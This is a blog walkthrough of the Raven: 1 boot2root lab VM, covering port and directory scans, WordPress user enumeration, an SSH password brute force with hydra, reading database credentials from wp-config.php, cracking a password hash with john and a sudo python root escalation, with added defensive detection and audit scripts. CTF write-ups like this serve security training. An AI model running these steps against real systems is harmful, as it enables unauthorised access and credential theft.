VM - Raven: 1 Walkthrough

Posted by 青蛙愛輪滑 on 2019-04-14

This post records my penetration-testing practice against Raven: 1. The VM comes from www.vulnhub.com.
Blog collection: CTF-oriented VM cracking series
Download link: Raven: 1


2019-04-14 10:58:06 [Original]

1. Official description

Name: Raven: 1
Date release: 14 Aug 2018
Description: Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networking.

2. Walkthrough

First, find the target's IP address with netdiscover:

root@kali:~# netdiscover -r 10.10.10.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                              
                                                                                                            
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 10.10.10.1      00:50:56:c0:00:08      1      60  VMware, Inc.                                             
 10.10.10.2      00:50:56:fb:16:b2      1      60  VMware, Inc.                                             
 10.10.10.79     00:0c:29:dc:29:fc      1      60  VMware, Inc.                                             
 10.10.10.254    00:50:56:e0:63:df      1      60  VMware, Inc.  

The target IP is 10.10.10.79; next, scan its ports:

root@kali:~# nmap -Pn -p- 10.10.10.79
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-14 07:03 EDT
Nmap scan report for 10.10.10.79
Host is up (0.00063s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
52632/tcp open  unknown
MAC Address: 00:0C:29:DC:29:FC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.83 seconds

Port 80 is open, so browse to it. The site is carefully built; I looked through the page source for a flag.

A flag finally turns up on the service page:
flag1{b9bbcb33e11b80be759c4e844862482d}

Next, brute-force directories with dirb:

root@kali:~# dirb http://10.10.10.79
START_TIME: Sun Apr 14 07:07:14 2019
URL_BASE: http://10.10.10.79/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612                                                          
---- Scanning URL: http://10.10.10.79/ ----
==> DIRECTORY: http://10.10.10.79/css/                                                                      
==> DIRECTORY: http://10.10.10.79/fonts/                                                                    
==> DIRECTORY: http://10.10.10.79/img/                                                                      
+ http://10.10.10.79/index.html (CODE:200|SIZE:16819)                                                       
==> DIRECTORY: http://10.10.10.79/js/                                                                       
==> DIRECTORY: http://10.10.10.79/manual/                                                                   
+ http://10.10.10.79/server-status (CODE:403|SIZE:299)                                                      
==> DIRECTORY: http://10.10.10.79/vendor/                                                                   
==> DIRECTORY: http://10.10.10.79/wordpress/   

The site runs the WordPress CMS; scan it with wpscan:

root@kali:~# wpscan --url  http://10.10.10.79/wordpress --wp-content-dir -ep -et -eu
[+] Enumerating usernames ...
[+] We identified the following 2 users:
    +----+---------+---------------+
    | ID | Login   | Name          |
    +----+---------+---------------+
    | 1  | michael | michae        |
    | 2  | steven  | Steven Seagul |
    +----+---------+---------------+

[+] Finished: Sat Apr 13 23:31:31 2019
[+] Elapsed time: 00:00:09
[+] Requests made: 1065
[+] Memory used: 25.695 MB

Enumeration gave us two usernames; next, brute-force their passwords with hydra (users.txt contains the two logins):

root@kali:/usr/share/wordlists# gzip -d rockyou.txt.gz
root@kali:~# hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.79

Hydra (http://www.thc.org/thc-hydra) starting at 2019-04-14 00:03:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688798 login tries (l:2/p:0), ~14344399 tries per task
[DATA] attacking ssh://10.10.10.79:22/
[22][ssh] host: 10.10.10.79   login: michael   password: michael
[STATUS] 14344655.00 tries/min, 14344655 tries in 00:00h, 0 to do in 01:00h, 14344148 active
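A defender's counterpart to the hydra run above, added here as an example and not part of the original post: it parses constructed sshd auth.log lines (the sample lines, PIDs, timestamps and source addresses are made up) and raises an alert when one source address accumulates five or more failed logins inside a one-minute window, noting whether that address later authenticated successfully, which is the pattern to escalate. The function names, threshold and window are my choices.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of /var/log/auth.log lines (not captured from the VM).
SAMPLE_AUTH_LOG = """\
Apr 14 00:03:06 Raven sshd[2101]: Failed password for michael from 10.10.10.69 port 51002 ssh2
Apr 14 00:03:06 Raven sshd[2103]: Failed password for invalid user steven2 from 10.10.10.69 port 51004 ssh2
Apr 14 00:03:07 Raven sshd[2105]: Failed password for michael from 10.10.10.69 port 51006 ssh2
Apr 14 00:03:07 Raven sshd[2107]: Failed password for steven from 10.10.10.69 port 51008 ssh2
Apr 14 00:03:08 Raven sshd[2109]: Failed password for michael from 10.10.10.69 port 51010 ssh2
Apr 14 00:03:09 Raven sshd[2111]: Accepted password for michael from 10.10.10.69 port 51012 ssh2
Apr 14 09:15:40 Raven sshd[2300]: Failed password for michael from 10.10.10.50 port 40001 ssh2
Apr 14 09:20:01 Raven sshd[2302]: Accepted publickey for michael from 10.10.10.50 port 40002 ssh2
"""

# Matches both "Failed password for [invalid user] X from IP" and "Accepted <method> for X from IP".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse_line(line, year=2019):
    """Parse one sshd log line; syslog omits the year, so it is supplied by the caller."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {source_ip: details} for sources with >= threshold failures in any window."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    failures = defaultdict(list)
    for e in events:
        if e["result"] == "Failed":
            failures[e["ip"]].append(e)

    alerts = {}
    for ip, evs in failures.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans at most window_seconds.
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= threshold:
                # A later successful login from the same source is the strongest signal.
                later_success = [e for e in events
                                 if e["ip"] == ip and e["result"] == "Accepted"
                                 and e["ts"] >= evs[end]["ts"]]
                alerts[ip] = {
                    "failures": count,
                    "users": sorted({e["user"] for e in evs[start:end + 1]}),
                    "followed_by_success": bool(later_success),
                    "success_user": later_success[0]["user"] if later_success else None,
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"ALERT {ip}: {info}")
```

On a real host, feed the function the tail of /var/log/auth.log (or the journal output for sshd); the single failure from 10.10.10.50 in the sample stays below the threshold and is not reported, which is what keeps such a rule quiet on ordinary typos.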

Hydra found a password; try logging in with it:

[22][ssh] host: 10.10.10.79   login: michael   password: michael

root@kali:~# ssh michael@10.10.10.79
michael@10.10.10.79's password:
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
michael@Raven:~$ cd /var/www/
michael@Raven:/var/www$ ls
flag2.txt  html
michael@Raven:/var/www$ cat flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
michael@Raven:/var/www$

flag2 obtained here:
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

michael@Raven:~$ uname -a
Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux

The kernel version is fairly recent, so kernel privilege escalation is probably not an option.

Since this is a CMS, look for the database credentials; they usually live in the configuration file (wp-config.php here):

michael@Raven:/var/www/html/wordpress$ vi wp-config.php

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
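The settings just shown are exactly what a configuration audit should flag. The script below is an added example, not from the post and not part of WordPress: it parses define() lines from a constructed wp-config.php excerpt (the password value is a placeholder, not the VM's) and reports a root database user, an empty password, a remote database host and, when a file mode is passed in, a file readable by every local user, which is what let an ordinary shell account read the credentials here. Function names are my own.

```python
import re
import stat

# Constructed wp-config.php excerpt mirroring the settings above; the password
# value is a placeholder, not the one from the VM.
SAMPLE_WP_CONFIG = """\
<?php
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'PLACEHOLDER_PASSWORD');
/** MySQL hostname */
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8mb4');
define('DB_COLLATE', '');
"""

# Matches define('KEY', 'value'); with either quote style. Values that contain a
# quote character are not expected in these particular settings.
DEFINE_RE = re.compile(
    r"""^\s*define\(\s*['"](\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)\s*;""", re.M)


def parse_defines(text):
    """Return the define()'d settings as a dict of name -> value."""
    return dict(DEFINE_RE.findall(text))


def audit_wp_config(text, mode=None):
    """Return findings for the settings and, if given, the file's st_mode bits."""
    cfg = parse_defines(text)
    findings = []
    if cfg.get("DB_USER") == "root":
        findings.append("DB_USER is the MySQL root account; create a user with rights "
                        "only on the WordPress database")
    if not cfg.get("DB_PASSWORD"):
        findings.append("DB_PASSWORD is empty")
    # DB_HOST may carry a port suffix such as "db.internal:3306".
    if cfg.get("DB_HOST", "localhost").split(":")[0] not in ("localhost", "127.0.0.1"):
        findings.append(f"DB_HOST {cfg['DB_HOST']!r} is a remote server; restrict and "
                        "encrypt that connection")
    if mode is not None and mode & stat.S_IROTH:
        findings.append("file is readable by every local user; chmod 640 and give it to "
                        "the web server's group only")
    return findings


if __name__ == "__main__":
    for finding in audit_wp_config(SAMPLE_WP_CONFIG, mode=0o644):
        print("-", finding)
```

To audit a real installation, read the file and pass `os.stat(path).st_mode` as `mode`; the mode check is what would have caught the situation on this VM, where a non-web user could simply `vi wp-config.php`.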

Database username: root
Password: R@v3nSecurity
With the password in hand, log in to the database:

michael@Raven:/var/www/html/wordpress$ mysql -u root -p
mysql> show databases;
mysql> use wordpress;
mysql> show tables;

Walking through the database contents for anything useful shows that flag3 and flag4 are both hidden in wp_posts:

mysql> select * from wp_posts;
+----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+
| ID | post_author | post_date           | post_date_gmt       | post_content                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            | post_title   | post_excerpt | post_status | comment_status | ping_status | post_password | post_name     | to_ping | pinged | post_modified       | post_modified_gmt   | post_content_filtered | post_parent | guid                                                             | menu_order | post_type | post_mime_type | comment_count |
+----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+
|  1 |           1 | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | Welcome to WordPress. This is your first post. Edit or delete it, then start writing!                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   | Hello world! |              | publish     | open           | open        |               | hello-world   |         |        | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 |                       |           0 | http://192.168.206.131/wordpress/?p=1                            |          0 | post      |                |             1 |
|  2 |           1 | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | This is an example page. It's different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:

<blockquote>Hi there! I'm a miner by day, aspiring actor by night, and this is my website. I live in Kalgoorlie, have a great dog named Red, and I like yabbies. (And gettin' a tan.)</blockquote>

...or something like this:

<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>

As a new WordPress user, you should go to <a href="http://192.168.206.131/wordpress/wp-admin/">your dashboard</a> to delete this page and create new pages for your content. Have fun! | Sample Page  |              | publish     | closed         | open        |               | sample-page   |         |        | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 |                       |           0 | http://192.168.206.131/wordpress/?page_id=2                      |          0 | page      |                |             0 |
|  4 |           1 | 2018-08-13 01:48:31 | 0000-00-00 00:00:00 | flag3{afc01ab56b50591e7dccf93122770cd2}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 | flag3        |              | draft       | open           | open        |               |               |         |        | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 |                       |           0 | http://raven.local/wordpress/?p=4                                |          0 | post      |                |             0 |
|  5 |           1 | 2018-08-12 23:31:59 | 2018-08-12 23:31:59 | flag4{715dea6c055b9fe3337544932f2941ce}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 | flag4        |              | inherit     | closed         | closed      |               | 4-revision-v1 |         |        | 2018-08-12 23:31:59 | 2018-08-12 23:31:59 |                       |           4 | http://raven.local/wordpress/index.php/2018/08/12/4-revision-v1/ |          0 | revision  |                |             0 |
|  7 |           2 | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 | flag3{afc01ab56b50591e7dccf93122770cd2}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 | flag3        |              | inherit     | closed         | closed      |               | 4-revision-v1 |         |        | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 |                       |           4 | http://raven.local/wordpress/index.php/2018/08/13/4-revision-v1/ |          0 | revision  |                |             0 |
+----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+
5 rows in set (0.00 sec)

At this point all four flags have been collected, but we still do not have root:
flag3{afc01ab56b50591e7dccf93122770cd2}
flag4{715dea6c055b9fe3337544932f2941ce}

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url | user_registered     | user_activation_key | user_status | display_name   |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
|  1 | michael    | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael       | michael@raven.org |          | 2018-08-12 22:49:12 |                     |           0 | michael        |
|  2 | steven     | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven        | steven@raven.org  |          | 2018-08-12 23:31:16 |                     |           0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)

The password hashes need to be cracked; michael's password is already known, so crack steven's:

root@kali:~# cat hashs.txt
$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
root@kali:~# john hashs.txt
pink84           (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed

root@kali:~# john -show hashs.txt
?:pink84

The password is pink84 for user steven; log in:

root@kali:~# ssh steven@10.10.10.79
steven@10.10.10.79's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 14 14:33:53 2019 from 10.10.10.69
$

Searching for files owned by the user turned up nothing useful:

find / -user steven -type f 2>&1 | grep -v "Permission" | grep -v "No such" | grep -v "proc"

Check the sudo privileges:

$ sudo -l
Matching Defaults entries for steven on raven:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User steven may run the following commands on raven:
    (ALL) NOPASSWD: /usr/bin/python
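Added example, not from the post: an audit that parses `sudo -l` output such as the listing above (reconstructed here with two extra made-up rules for contrast) and rates each rule. A shell-capable program or interpreter that can be run as root without argument restrictions is rated high when it is NOPASSWD and medium otherwise; any other NOPASSWD entry is listed for review. The program list, rating scheme and function names are my choices.

```python
import os
import re

# Constructed `sudo -l` output modelled on the listing above; the systemctl and
# apt-get rules are made up for contrast and were not on the VM.
SAMPLE_SUDO_L = """\
Matching Defaults entries for steven on raven:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User steven may run the following commands on raven:
    (ALL) NOPASSWD: /usr/bin/python
    (root) /usr/bin/systemctl restart apache2
    (ALL) NOPASSWD: /usr/bin/apt-get
"""

# Programs that run arbitrary code or spawn a shell when invoked without
# argument restrictions (a short hand-picked list, not exhaustive).
SHELL_CAPABLE = {
    "python", "python2", "python3", "perl", "ruby", "php", "node",
    "bash", "sh", "dash", "zsh", "vi", "vim", "less", "more", "awk", "find", "env",
}

# "(runas) TAG: TAG: /path/to/cmd optional args"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)(?P<args>.*)$")


def parse_sudo_rules(text):
    """Extract the command rules that follow the 'User ... may run' header."""
    rules = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({
                "runas": m["runas"].strip(),
                "nopasswd": "NOPASSWD:" in m["tags"],
                "cmd": m["cmd"],
                "args": m["args"].strip(),
            })
    return rules


def audit_sudo_rules(text):
    """Return (severity, command, reason) tuples, most severe first."""
    findings = []
    for rule in parse_sudo_rules(text):
        # Normalise versioned interpreter names: python3.5 -> python3, python2.7 -> python2.
        name = re.sub(r"(\d)\.\d+$", r"\1", os.path.basename(rule["cmd"]))
        if name in SHELL_CAPABLE and not rule["args"]:
            severity = "high" if rule["nopasswd"] else "medium"
            findings.append((severity, rule["cmd"],
                             f"{name} can run arbitrary code as {rule['runas']}; replace the "
                             "rule with a fixed wrapper script that takes no user input"))
        elif rule["nopasswd"]:
            findings.append(("low", rule["cmd"],
                             "passwordless rule; confirm the command cannot be abused"))
    order = {"high": 0, "medium": 1, "low": 2}
    return sorted(findings, key=lambda f: order[f[0]])


if __name__ == "__main__":
    for severity, cmd, reason in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"[{severity}] {cmd}: {reason}")
```

Run it against `sudo -l` output collected from each host (or against the `sudo -l -U user` output for every account) as part of a baseline check; the rule on this VM would come back as high.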

python can be run through sudo without a password, which gives full root privileges; run it:

$ sudo python -c 'import pty; pty.spawn("/bin/bash")'
root@Raven:/home/steven#
root@Raven:/home/steven# id
uid=0(root) gid=0(root) groups=0(root)

There is usually a flag in the /root directory; let's take a look:

root@Raven:/home/steven# cd /root/
root@Raven:~# ls
flag4.txt
root@Raven:~# cat flag4.txt
 ______
| ___ \
| |_/ /__ ___   _____ _ __
|    // _` \ \ / / _ \ '_ \
| |\ \ (_| |\ V /  __/ | | |
\_| \_\__,_| \_/ \___|_| |_|


flag4{715dea6c055b9fe3337544932f2941ce}

CONGRATULATIONS on successfully rooting Raven!

This is my first Boot2Root VM - I hope you enjoyed it.

Hit me up on Twitter and let me know what you thought:

@mccannwj / wjmccann.github.io

Sure enough, there is a flag4:
flag4{715dea6c055b9fe3337544932f2941ce}
